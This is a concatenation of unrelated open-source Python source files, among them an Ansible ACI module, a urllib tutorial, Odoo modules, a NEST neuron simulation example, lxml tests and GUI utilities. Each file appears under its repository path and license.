from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
from ansible.module_utils.basic import AnsibleModule
def main():
argument_spec = aci_argument_spec()
argument_spec.update(
contract=dict(type='str', aliases=['contract_name']), # Not required for querying all objects
filter=dict(type='str', aliases=['filter_name']), # Not required for querying all objects
log=dict(tyep='str', choices=['log', 'none'], aliases=['directive']),
subject=dict(type='str', aliases=['contract_subject', 'subject_name']), # Not required for querying all objects
tenant=dict(type='str', aliases=['tenant_name']), # Not required for querying all objects
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['contract', 'filter', 'subject', 'tenant']],
['state', 'present', ['contract', 'filter', 'subject', 'tenant']],
],
)
contract = module.params['contract']
filter_name = module.params['filter']
log = module.params['log']
subject = module.params['subject']
tenant = module.params['tenant']
state = module.params['state']
# Add subject_filter key to modul.params for building the URL
module.params['subject_filter'] = filter_name
# Convert log to empty string if none, as that is what API expects. An empty string is not a good option to present the user.
if log == 'none':
log = ''
aci = ACIModule(module)
aci.construct_url(
root_class=dict(
aci_class='fvTenant',
aci_rn='tn-{0}'.format(tenant),
module_object=tenant,
target_filter={'name': tenant},
),
subclass_1=dict(
aci_class='vzBrCP',
aci_rn='brc-{0}'.format(contract),
module_object=contract,
target_filter={'name': contract},
),
subclass_2=dict(
aci_class='vzSubj',
aci_rn='subj-{0}'.format(subject),
module_object=subject,
target_filter={'name': subject},
),
subclass_3=dict(
aci_class='vzRsSubjFiltAtt',
aci_rn='rssubjFiltAtt-{0}'.format(filter_name),
module_object=filter_name,
target_filter={'tnVzFilterName': filter_name},
),
)
aci.get_existing()
if state == 'present':
aci.payload(
aci_class='vzRsSubjFiltAtt',
class_config=dict(
tnVzFilterName=filter_name,
directives=log,
),
)
aci.get_diff(aci_class='vzRsSubjFiltAtt')
aci.post_config()
elif state == 'absent':
aci.delete_config()
# Remove subject_filter used to build URL from module.params
module.params.pop('subject_filter')
aci.exit_json()
if __name__ == "__main__":
main()
| gpl-3.0 |
alistair-broomhead/robotframework-selenium2library | test/lib/mockito/spying.py | 70 | 1062 | #!/usr/bin/env python
# coding: utf-8
'''Spying on real objects.'''
from invocation import RememberedProxyInvocation, VerifiableInvocation
from mocking import TestDouble
__author__ = "Serhiy Oplakanets <[email protected]>"
__copyright__ = "Copyright 2009-2010, Mockito Contributors"
__license__ = "MIT"
__maintainer__ = "Mockito Maintainers"
__email__ = "[email protected]"
__all__ = ['spy']
def spy(original_object):
return Spy(original_object)
class Spy(TestDouble):
strict = True # spies always have to check if method exists
def __init__(self, original_object):
self.original_object = original_object
self.invocations = []
self.verification = None
def __getattr__(self, name):
if self.verification:
return VerifiableInvocation(self, name)
else:
return RememberedProxyInvocation(self, name)
def remember(self, invocation):
self.invocations.insert(0, invocation)
def pull_verification(self):
v = self.verification
self.verification = None
return v
| apache-2.0 |
michaelliao/learn-python3 | samples/commonlib/use_urllib.py | 20 | 2195 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from urllib import request, parse
# get:
with request.urlopen('https://api.douban.com/v2/book/2129650') as f:
data = f.read()
print('Status:', f.status, f.reason)
for k, v in f.getheaders():
print('%s: %s' % (k, v))
print('Data:', data.decode('utf-8'))
# advanced get:
req = request.Request('http://www.douban.com/')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
with request.urlopen(req) as f:
print('Status:', f.status, f.reason)
for k, v in f.getheaders():
print('%s: %s' % (k, v))
print('Data:', f.read().decode('utf-8'))
# post:
print('Login to weibo.cn...')
email = input('Email: ')
passwd = input('Password: ')
login_data = parse.urlencode([
('username', email),
('password', passwd),
('entry', 'mweibo'),
('client_id', ''),
('savestate', '1'),
('ec', ''),
('pagerefer', 'https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F%3Fjumpfrom%3Dweibocom&jumpfrom=weibocom')
])
req = request.Request('https://passport.weibo.cn/sso/login')
req.add_header('Origin', 'https://passport.weibo.cn')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F%3Fjumpfrom%3Dweibocom')
with request.urlopen(req, data=login_data.encode('utf-8')) as f:
print('Status:', f.status, f.reason)
for k, v in f.getheaders():
print('%s: %s' % (k, v))
print('Data:', f.read().decode('utf-8'))
# with proxy and proxy auth:
proxy_handler = urllib.request.ProxyHandler({'http': 'http://www.example.com:3128/'})
proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()
proxy_auth_handler.add_password('realm', 'host', 'username', 'password')
opener = urllib.request.build_opener(proxy_handler, proxy_auth_handler)
with opener.open('http://www.example.com/login.html') as f:
pass
| gpl-2.0 |
dongritengfei/phantomjs | src/qt/qtwebkit/Tools/QueueStatusServer/model/activeworkitems.py | 140 | 3975 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from google.appengine.ext import db
from datetime import timedelta, datetime
import time
from model.queuepropertymixin import QueuePropertyMixin
class ActiveWorkItems(db.Model, QueuePropertyMixin):
queue_name = db.StringProperty()
item_ids = db.ListProperty(int)
item_dates = db.ListProperty(float)
date = db.DateTimeProperty(auto_now_add=True)
# The id/date pairs should probably just be their own class.
def _item_time_pairs(self):
return zip(self.item_ids, self.item_dates)
def _set_item_time_pairs(self, pairs):
if pairs:
# The * operator raises on an empty list.
# db.Model does not tuples, we have to make lists.
self.item_ids, self.item_dates = map(list, zip(*pairs))
else:
self.item_ids = []
self.item_dates = []
def _append_item_time_pair(self, pair):
self.item_ids.append(pair[0])
self.item_dates.append(pair[1])
def _remove_item(self, item_id):
nonexpired_pairs = [pair for pair in self._item_time_pairs() if pair[0] != item_id]
self._set_item_time_pairs(nonexpired_pairs)
@classmethod
def key_for_queue(cls, queue_name):
return "active-work-items-%s" % (queue_name)
@classmethod
def lookup_by_queue(cls, queue_name):
return cls.get_or_insert(key_name=cls.key_for_queue(queue_name), queue_name=queue_name)
@staticmethod
def _expire_item(key, item_id):
active_work_items = db.get(key)
active_work_items._remove_item(item_id)
active_work_items.put()
def expire_item(self, item_id):
return db.run_in_transaction(self._expire_item, self.key(), item_id)
def deactivate_expired(self, now):
one_hour_ago = time.mktime((now - timedelta(minutes=60)).timetuple())
nonexpired_pairs = [pair for pair in self._item_time_pairs() if pair[1] > one_hour_ago]
self._set_item_time_pairs(nonexpired_pairs)
def next_item(self, work_item_ids, now):
for item_id in work_item_ids:
if item_id not in self.item_ids:
self._append_item_time_pair([item_id, time.mktime(now.timetuple())])
return item_id
return None
def time_for_item(self, item_id):
for active_item_id, time in self._item_time_pairs():
if active_item_id == item_id:
return datetime.fromtimestamp(time)
return None
| bsd-3-clause |
ritzk/ansible-modules-core | utilities/logic/fail.py | 198 | 1458 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2012 Dag Wieers <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: fail
short_description: Fail with custom message
description:
- This module fails the progress with a custom message. It can be
useful for bailing out when a certain condition is met using C(when).
version_added: "0.8"
options:
msg:
description:
- The customized message used for failing execution. If omitted,
fail will simple bail out with a generic message.
required: false
default: "'Failed as requested from task'"
author: "Dag Wieers (@dagwieers)"
'''
EXAMPLES = '''
# Example playbook using fail and when together
- fail: msg="The system may not be provisioned according to the CMDB status."
when: cmdb_status != "to-be-staged"
'''
| gpl-3.0 |
vivisect/synapse | synapse/tools/pushfile.py | 1 | 1334 | import os
import sys
import argparse
import synapse.telepath as s_telepath
import synapse.lib.output as s_output
def getArgParser():
p = argparse.ArgumentParser()
p.add_argument('cortex', help='telepath URL for a target cortex')
p.add_argument('filenames', nargs='+', help='files to upload')
p.add_argument('--tags', help='comma separated list of tags to add to the nodes')
return p
def main(argv, outp=None):
if outp is None: # pragma: no cover
outp = s_output.OutPut()
p = getArgParser()
opts = p.parse_args(argv)
core = s_telepath.openurl(opts.cortex)
tags = []
if opts.tags:
for tag in opts.tags.split(','):
tags.append(tag)
if tags:
outp.printf('adding tags: %r' % (tags,))
for path in opts.filenames:
with open(path, 'rb') as fd:
base = os.path.basename(path)
node = core.formNodeByFd(fd, name=base)
core.addTufoTags(node, tags)
iden = node[1].get('file:bytes')
size = node[1].get('file:bytes:size')
name = node[1].get('file:bytes:name')
outp.printf('file: %s (%d) added (%s) as %s' % (base, size, iden, name))
core.fini() # Shut down the proxy
if __name__ == '__main__': # pragma: no cover
sys.exit(main(sys.argv[1:]))
| apache-2.0 |
StefanRijnhart/odoomrp-wip | account_treasury_forecast/wizard/wiz_create_invoice.py | 31 | 2577 | # -*- encoding: utf-8 -*-
##############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
import openerp.addons.decimal_precision as dp
from openerp import models, fields, api
class WizCreateInvoice(models.TransientModel):
_name = 'wiz.create.invoice'
_description = 'Wizard to create invoices'
partner_id = fields.Many2one("res.partner", string="Partner")
journal_id = fields.Many2one("account.journal", string="Journal",
domain=[("type", "=", "purchase")])
description = fields.Char(string="Description")
amount = fields.Float(string="Amount",
digits_compute=dp.get_precision('Account'))
line_id = fields.Many2one("account.treasury.forecast.line.template",
string="Payment")
@api.one
def button_create_inv(self):
invoice_obj = self.env['account.invoice']
res_inv = invoice_obj.onchange_partner_id('in_invoice',
self.partner_id.id)
values = res_inv['value']
values['name'] = ('Treasury: ' + self.description + '/ Amount: ' +
str(self.amount))
values['reference'] = ('Treasury: ' + self.description + '/ Amount: ' +
str(self.amount))
values['partner_id'] = self.partner_id.id
values['journal_id'] = self.journal_id.id
values['type'] = 'in_invoice'
invoice_id = invoice_obj.create(values)
self.line_id.write({'invoice_id': invoice_id.id, 'paid': 1,
'journal_id': self.journal_id.id,
'partner_id': self.partner_id.id,
'amount': self.amount})
return {'type': 'ir.actions.act_window_close'}
| agpl-3.0 |
FedoraScientific/salome-paravis | src/PV_SWIG/paravis.py | 1 | 3020 | # Copyright (C) 2010-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : [email protected]
#
# File : paravis.py
# Module : PARAVIS
#
import os, new
import PARAVIS
import SALOME
import SALOME_Session_idl
import SALOMEDS
import SALOME_ModuleCatalog
from omniORB import CORBA
from time import sleep
from salome import *
myORB = None
myNamingService = None
myLifeCycleCORBA = None
myNamingService = None
myLocalStudyManager = None
myLocalStudy = None
myLocalParavis = None
myDelay = None
mySession = None
## Initialization of paravis server
def Initialize(theORB, theNamingService, theLifeCycleCORBA, theStudyManager, theStudy, theDelay) :
global myORB, myNamingService, myLifeCycleCORBA, myLocalStudyManager, myLocalStudy
global mySession, myDelay
myDelay = theDelay
myORB = theORB
myNamingService = theNamingService
myLifeCycleCORBA = theLifeCycleCORBA
myLocalStudyManager = theStudyManager
while mySession == None:
mySession = myNamingService.Resolve("/Kernel/Session")
mySession = mySession._narrow(SALOME.Session)
mySession.GetInterface()
myDelay = theDelay
sleep(myDelay)
myLocalParavis = myLifeCycleCORBA.FindOrLoadComponent("FactoryServer", "PARAVIS")
myLocalStudy = theStudy
myLocalParavis.SetCurrentStudy(myLocalStudy)
myLocalParavis.ActivateModule()
return myLocalParavis
def ImportFile(theFileName):
"Import a file of any format supported by ParaView"
myParavis.ImportFile(theFileName)
def createFunction(theName):
"Create function - constructor of Paravis object"
def MyFunction():
return myParavis.CreateClass(theName)
return MyFunction
def createConstructors():
"Create constructor functions according to list of extracted classes"
g = globals()
aClassNames = myParavis.GetClassesList();
for aName in aClassNames:
g[aName] = createFunction(aName)
## Initialize of a PARAVIS interface
myParavis = Initialize(orb, naming_service,lcc,myStudyManager,myStudy, 2)
## Initialize constructor functions
createConstructors()
## Initialize Paravis static objects
vtkSMObject = vtkSMObject()
vtkProcessModule = vtkProcessModule()
vtkPVPythonModule = vtkPVPythonModule()
vtkSMProxyManager = vtkSMProxyManager()
| lgpl-2.1 |
viktorradnai/screenwarp | utils/create_chessboard.py | 1 | 2170 | #!/usr/bin/python
import cv2
import wand.image
import wand.color
import wand.drawing
import sys
import logging
import argparse
logger = logging.getLogger(__name__)
def parse_cmdline():
parser = argparse.ArgumentParser(description='''
TODO: insert description.'''
)
parser.add_argument('-v', '--verbose', action='store_true', help="Enable verbose output")
parser.add_argument('-q', '--quiet', action='store_true', help="Output errors only")
parser.add_argument('-W', '--width', type=int, help="Target screen width. This will be the width of the output image.", default=1920)
parser.add_argument('-H', '--height', type=int, help="Target screen height. This will be the height of the output image.", default=1080)
parser.add_argument('-c', '--cols', type=int, help="Number of squares per column", default=16)
parser.add_argument('-r', '--rows', type=int, help="Number of squares per row", default=9)
parser.add_argument('filename', help="Image file")
args = parser.parse_args()
if args.verbose: loglevel = logging.DEBUG
elif args.quiet: loglevel = logging.ERROR
else: loglevel = logging.INFO
logging.basicConfig(level=loglevel, format='%(asctime)s %(levelname)s %(message)s')
return args
def main():
args = parse_cmdline()
screen_width = args.width
screen_height = args.height
square_width = screen_width / args.cols
square_height = screen_height / args.rows
image = wand.image.Image(width=screen_width, height=screen_height, background=wand.color.Color('#fff'))
with wand.drawing.Drawing() as draw:
draw.fill_color = wand.color.Color('#000')
for r in range(args.rows):
for c in range(args.cols):
if not (c + r) % 2:
continue
x = square_width * c
y = square_height * r
logger.debug("%s %s %s %s", x, y, square_width, square_height)
draw.rectangle(x, y, width=square_width, height=square_height)
draw.draw(image)
image.save(filename=args.filename)
exit(0)
# call main()
if __name__ == '__main__':
main()
| gpl-3.0 |
lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/IPython/utils/dir2.py | 3 | 2232 | # encoding: utf-8
"""A fancy version of Python's builtin :func:`dir` function.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import inspect
import types
def safe_hasattr(obj, attr):
"""In recent versions of Python, hasattr() only catches AttributeError.
This catches all errors.
"""
try:
getattr(obj, attr)
return True
except:
return False
def dir2(obj):
"""dir2(obj) -> list of strings
Extended version of the Python builtin dir(), which does a few extra
checks.
This version is guaranteed to return only a list of true strings, whereas
dir() returns anything that objects inject into themselves, even if they
are later not really valid for attribute access (many extension libraries
have such bugs).
"""
# Start building the attribute list via dir(), and then complete it
# with a few extra special-purpose calls.
try:
words = set(dir(obj))
except Exception:
# TypeError: dir(obj) does not return a list
words = set()
if safe_hasattr(obj, '__class__'):
words |= set(dir(obj.__class__))
# filter out non-string attributes which may be stuffed by dir() calls
# and poor coding in third-party modules
words = [w for w in words if isinstance(w, str)]
return sorted(words)
def get_real_method(obj, name):
"""Like getattr, but with a few extra sanity checks:
- If obj is a class, ignore everything except class methods
- Check if obj is a proxy that claims to have all attributes
- Catch attribute access failing with any exception
- Check that the attribute is a callable object
Returns the method or None.
"""
try:
canary = getattr(obj, '_ipython_canary_method_should_not_exist_', None)
except Exception:
return None
if canary is not None:
# It claimed to have an attribute it should never have
return None
try:
m = getattr(obj, name, None)
except Exception:
return None
if inspect.isclass(obj) and not isinstance(m, types.MethodType):
return None
if callable(m):
return m
return None
| mit |
Symphonia/Searcher | ImageView.py | 1 | 4861 | from PySide import QtGui, QtCore
import sys, os
class ImageView(QtGui.QWidget):
def __init__(self,imagelist,parent = None):
super(ImageView,self).__init__(parent)
self.imagesize = None
self.mode = ''
self.imageList = imagelist[0]
self.index = imagelist[1]
self.title_label = QtGui.QLabel(self)
self.imagesizelabel = QtGui.QLabel(self)
self.cursizelabel = QtGui.QLabel(self)
self.image_label = QtGui.QLabel(self)
self.image_label.setBackgroundRole(QtGui.QPalette.Base)
self.image_label.setSizePolicy(QtGui.QSizePolicy.Ignored,QtGui.QSizePolicy.Ignored)
self.image_label.setScaledContents(True)
self.installEventFilter(self)
CloseWindowAction = QtGui.QAction(self)
CloseWindowAction.setShortcut("Ctrl+W")
CloseWindowAction.triggered.connect(self.close)
self.addAction(CloseWindowAction)
self.scrollarea = QtGui.QScrollArea(self)
self.scrollarea.setBackgroundRole(QtGui.QPalette.Dark)
self.scrollarea.setWidget(self.image_label)
hbox = QtGui.QHBoxLayout()
hbox.addWidget(self.imagesizelabel)
hbox.addWidget(self.title_label)
hbox.addWidget(self.cursizelabel)
hbox.setContentsMargins(3,0,3,0)
qbox = QtGui.QVBoxLayout(self)
qbox.addLayout(hbox)
qbox.addWidget(self.scrollarea)
qbox.setContentsMargins(0,5,0,0)
info = QtCore.QFileInfo(self.imageList[self.index])
self.title_label.setText(info.fileName())
self.title_label.setAlignment(QtCore.Qt.AlignCenter)
self.imagesizelabel.setAlignment(QtCore.Qt.AlignLeft)
self.cursizelabel.setAlignment(QtCore.Qt.AlignRight)
self.setMinimumHeight(10)
self.setMinimumWidth(10)
self.setWindowTitle('Image Viewer')
self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.setGeometry(10,10,500,400)
if self.index ==0:
self.open(self.imageList[0])
self.show()
def open(self,image_path):
if image_path:
image = QtGui.QImage(image_path)
if image.isNull():
QtGui.QMessageBox.information(self,"Image View","Cannot load %s." %image_path)
return
self.image_label.setPixmap(QtGui.QPixmap.fromImage(image))
self.scrollarea.setWidgetResizable(True)
self.imagesize = image.size()
self.updateTitle()
def eventFilter(self,object,event):
if event.type() == QtCore.QEvent.KeyRelease:
if event.key() == QtCore.Qt.Key_Left:
if self.index ==0: self.index = len(self.imageList)
self.index-=1
self.open(self.imageList[self.index])
if event.key() == QtCore.Qt.Key_Right:
if self.index>=len(self.imageList)-1: self.index =0
self.index+=1
self.open(self.imageList[self.index])
if event.key() == QtCore.Qt.Key_W:
self.resize(500,400)
if event.key() == QtCore.Qt.Key_R:
if self.imagesize.height() > QtGui.QDesktopWidget().availableGeometry().height():
ratio = QtGui.QDesktopWidget().availableGeometry().height() / self.imagesize.height()
self.resize(int(self.imagesize.width()*ratio),int(self.imagesize.height()*ratio))
else:
self.resize(self.imagesize.width(),self.imagesize.height())
if event.key() == QtCore.Qt.Key_E:
self.move(self.pos().x(),0)
ratio = QtGui.QDesktopWidget().availableGeometry().height() / self.imagesize.height()
self.resize(int(self.imagesize.width()*ratio),int(self.imagesize.height()*ratio))
self.updateTitle()
if event.key() == QtCore.Qt.Key_Escape:
self.close()
if event.type() == QtCore.QEvent.MouseButtonPress:
if event.pos().x() < self.size().width() -20:
self.diff = event.globalPos() - self.frameGeometry().topLeft()
self.mode = 'drag'
else:
self.mode = 'resize'
if event.type() == QtCore.QEvent.MouseMove:
if self.mode == 'drag':
self.move(event.globalPos()-self.diff)
else:
self.resize(event.pos().x(),event.pos().y())
self.updateTitle()
return False
def updateTitle(self):
info = QtCore.QFileInfo(self.imageList[self.index])
self.imagesizelabel.setText(str(self.imagesize.width()) +','+ str(self.imagesize.height()) + ' ->')
self.title_label.setText(info.fileName())
self.cursizelabel.setText('<- ' + str(self.size().width()) + ',' + str(self.size().height()))
def mousePressEvent(self,event):
print(event.buttons())
if event.buttons() == QtCore.Qt.LeftButton:
if event.pos().x() < self.size().width() -20:
self.diff = event.globalPos() - self.frameGeometry().topLeft()
self.mode = 'drag'
else:
self.mode = 'resize'
def mouseMoveEvent(self,event):
if event.buttons() == QtCore.Qt.LeftButton:
if self.mode == 'drag':
self.move(event.globalPos()-self.diff)
else:
self.resize(event.pos().x(),event.pos().y())
# def main():
# app = QtGui.QApplication(sys.argv)
# imageview = ImageView()
# sys.exit(app.exec_())
# if __name__ == '__main__':
# main()
| mit |
hdinsight/hue | desktop/core/ext-py/lxml-3.4.4/src/lxml/html/tests/test_frames.py | 20 | 1557 | import unittest, sys
from lxml.tests.common_imports import make_doctest, doctest
import lxml.html
from lxml.html import html_parser, XHTML_NAMESPACE
class FrameTest(unittest.TestCase):
def test_parse_fragments_fromstring(self):
parser = lxml.html.HTMLParser(encoding='utf-8', remove_comments=True)
html = """<frameset>
<frame src="main.php" name="srcpg" id="srcpg" frameborder="0" rolling="Auto" marginwidth="" marginheight="0">
</frameset>"""
etree_document = lxml.html.fragments_fromstring(html, parser=parser)
self.assertEqual(len(etree_document), 1)
root = etree_document[0]
self.assertEqual(root.tag, "frameset")
frame_element = root[0]
self.assertEqual(frame_element.tag, 'frame')
def test_parse_fromstring(self):
parser = lxml.html.HTMLParser(encoding='utf-8', remove_comments=True)
html = """<html><frameset>
<frame src="main.php" name="srcpg" id="srcpg" frameborder="0" rolling="Auto" marginwidth="" marginheight="0">
</frameset></html>"""
etree_document = lxml.html.fromstring(html, parser=parser)
self.assertEqual(etree_document.tag, 'html')
self.assertEqual(len(etree_document), 1)
frameset_element = etree_document[0]
self.assertEqual(len(frameset_element), 1)
frame_element = frameset_element[0]
self.assertEqual(frame_element.tag, 'frame')
def test_suite():
loader = unittest.TestLoader()
return loader.loadTestsFromModule(sys.modules[__name__]) | apache-2.0 |
Silmathoron/nest-simulator | pynest/examples/if_curve.py | 5 | 5195 | # -*- coding: utf-8 -*-
#
# if_curve.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""IF curve example
----------------------
This example illustrates how to measure the I-F curve of a neuron.
The program creates a small group of neurons and injects a noisy current
:math:`I(t) = I_mean + I_std*W(t)`
where :math:`W(t)` is a white noise process.
The programm systematically drives the current through a series of values in
the two-dimensional `(I_mean, I_std)` space and measures the firing rate of
the neurons.
In this example, we measure the I-F curve of the adaptive exponential
integrate and fire neuron (``aeif_cond_exp``), but any other neuron model that
accepts current inputs is possible. The model and its parameters are
supplied when the IF_curve object is created.
"""
import numpy
import nest
import shelve
###############################################################################
# Here we define which model and the neuron parameters to use for measuring
# the transfer function.
model = 'aeif_cond_exp'
params = {'a': 4.0,
'b': 80.8,
'V_th': -50.4,
'Delta_T': 2.0,
'I_e': 0.0,
'C_m': 281.0,
'g_L': 30.0,
'V_reset': -70.6,
'tau_w': 144.0,
't_ref': 5.0,
'V_peak': -40.0,
'E_L': -70.6,
'E_ex': 0.,
'E_in': -70.}
class IF_curve():
t_inter_trial = 200. # Interval between two successive measurement trials
t_sim = 1000. # Duration of a measurement trial
n_neurons = 100 # Number of neurons
n_threads = 4 # Nubmer of threads to run the simulation
def __init__(self, model, params=False):
self.model = model
self.params = params
self.build()
self.connect()
def build(self):
#######################################################################
# We reset NEST to delete information from previous simulations
# and adjust the number of threads.
nest.ResetKernel()
nest.SetKernelStatus({'local_num_threads': self.n_threads})
#######################################################################
# We set the default parameters of the neuron model to those
# defined above and create neurons and devices.
if self.params:
nest.SetDefaults(self.model, self.params)
self.neuron = nest.Create(self.model, self.n_neurons)
self.noise = nest.Create('noise_generator')
self.spike_detector = nest.Create('spike_detector')
def connect(self):
#######################################################################
# We connect the noisy current to the neurons and the neurons to
# the spike detectors.
nest.Connect(self.noise, self.neuron, 'all_to_all')
nest.Connect(self.neuron, self.spike_detector, 'all_to_all')
def output_rate(self, mean, std):
self.build()
self.connect()
#######################################################################
# We adjust the parameters of the noise according to the current
# values.
self.noise.set(mean=mean, std=std, start=0.0, stop=1000., origin=0.)
# We simulate the network and calculate the rate.
nest.Simulate(self.t_sim)
rate = self.spike_detector.n_events * 1000. / (1. * self.n_neurons * self.t_sim)
return rate
def compute_transfer(self, i_mean=(400.0, 900.0, 50.0),
i_std=(0.0, 600.0, 50.0)):
#######################################################################
# We loop through all possible combinations of `(I_mean, I_sigma)`
# and measure the output rate of the neuron.
self.i_range = numpy.arange(*i_mean)
self.std_range = numpy.arange(*i_std)
self.rate = numpy.zeros((self.i_range.size, self.std_range.size))
nest.set_verbosity('M_WARNING')
for n, i in enumerate(self.i_range):
print('I = {0}'.format(i))
for m, std in enumerate(self.std_range):
self.rate[n, m] = self.output_rate(i, std)
transfer = IF_curve(model, params)
transfer.compute_transfer()
###############################################################################
# After the simulation is finished we store the data into a file for
# later analysis.
with shelve.open(model + '_transfer.dat') as dat:
dat['I_mean'] = transfer.i_range
dat['I_std'] = transfer.std_range
dat['rate'] = transfer.rate
| gpl-2.0 |
Eficent/odoomrp-wip | stock_quant_valuation/tests/test_stock_quant_valuation.py | 10 | 2798 | # -*- coding: utf-8 -*-
# (c) 2016 Ainara Galdona - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
import openerp.tests.common as common
from openerp import fields
class TestStockQuantValuation(common.TransactionCase):
def setUp(self):
super(TestStockQuantValuation, self).setUp()
self.quant_model = self.env['stock.quant']
self.hist_model = self.env['stock.history']
self.location_model = self.env['stock.location']
self.product = self.env.ref('product.product_product_34')
self.location = self.location_model.search([('usage', '=',
'internal')], limit=1)
def test_quant_valuation(self):
self.product.sudo().write({'cost_method': 'real',
'standard_price': 20,
'manual_standard_cost': 35})
quant = self.quant_model.create(
{'product_id': self.product.id,
'cost': 20,
'location_id': self.location.id,
'qty': 5})
self.assertEqual(quant.manual_value, (35 * 5),
"Incorrect Manual Value for quant.")
self.assertEqual(quant.real_value, (20 * 5),
"Incorrect Real Value for quant.")
def test_stock_history(self):
hist_line = self.hist_model.search([], limit=1)
hist_line.product_id.sudo().manual_standard_cost = 40
self.assertEqual(hist_line.manual_value, (hist_line.quantity * 40),
"Incorrect Manual Value for history line.")
self.assertEqual(hist_line.real_value,
(hist_line.quantity * hist_line.price_unit_on_quant),
"Incorrect Real Value for history line.")
def test_stock_history_read_group(self):
gfields = ['product_id', 'location_id', 'move_id', 'date', 'source',
'quantity', 'inventory_value', 'manual_value', 'real_value']
groupby = ['product_id']
domain = [('date', '<=', fields.Date.today())]
res = self.hist_model.read_group(
domain=domain, fields=gfields, groupby=groupby, offset=0,
limit=None, orderby=False, lazy=True)
if res:
line = res[0]
line_domain = line.get('__domain', domain)
group_lines = self.hist_model.search(line_domain)
sum_real = sum([x.real_value for x in group_lines])
sum_manual = sum([x.manual_value for x in group_lines])
self.assertEqual(line['real_value'], sum_real,
"Real value not correct sum.")
self.assertEqual(line['manual_value'], sum_manual,
"Manual value not correct sum.")
| agpl-3.0 |
L3nzian/AutoPermit | ap_connections.py | 1 | 7082 | #import pyodbc
import odbc
import _winreg
import ConfigParser
config_file = 'AutoPermit.ini'
def get_config_dict(config_file, section):
"""
Reads a config file
:param config_file: a config file usable by ConfigParser
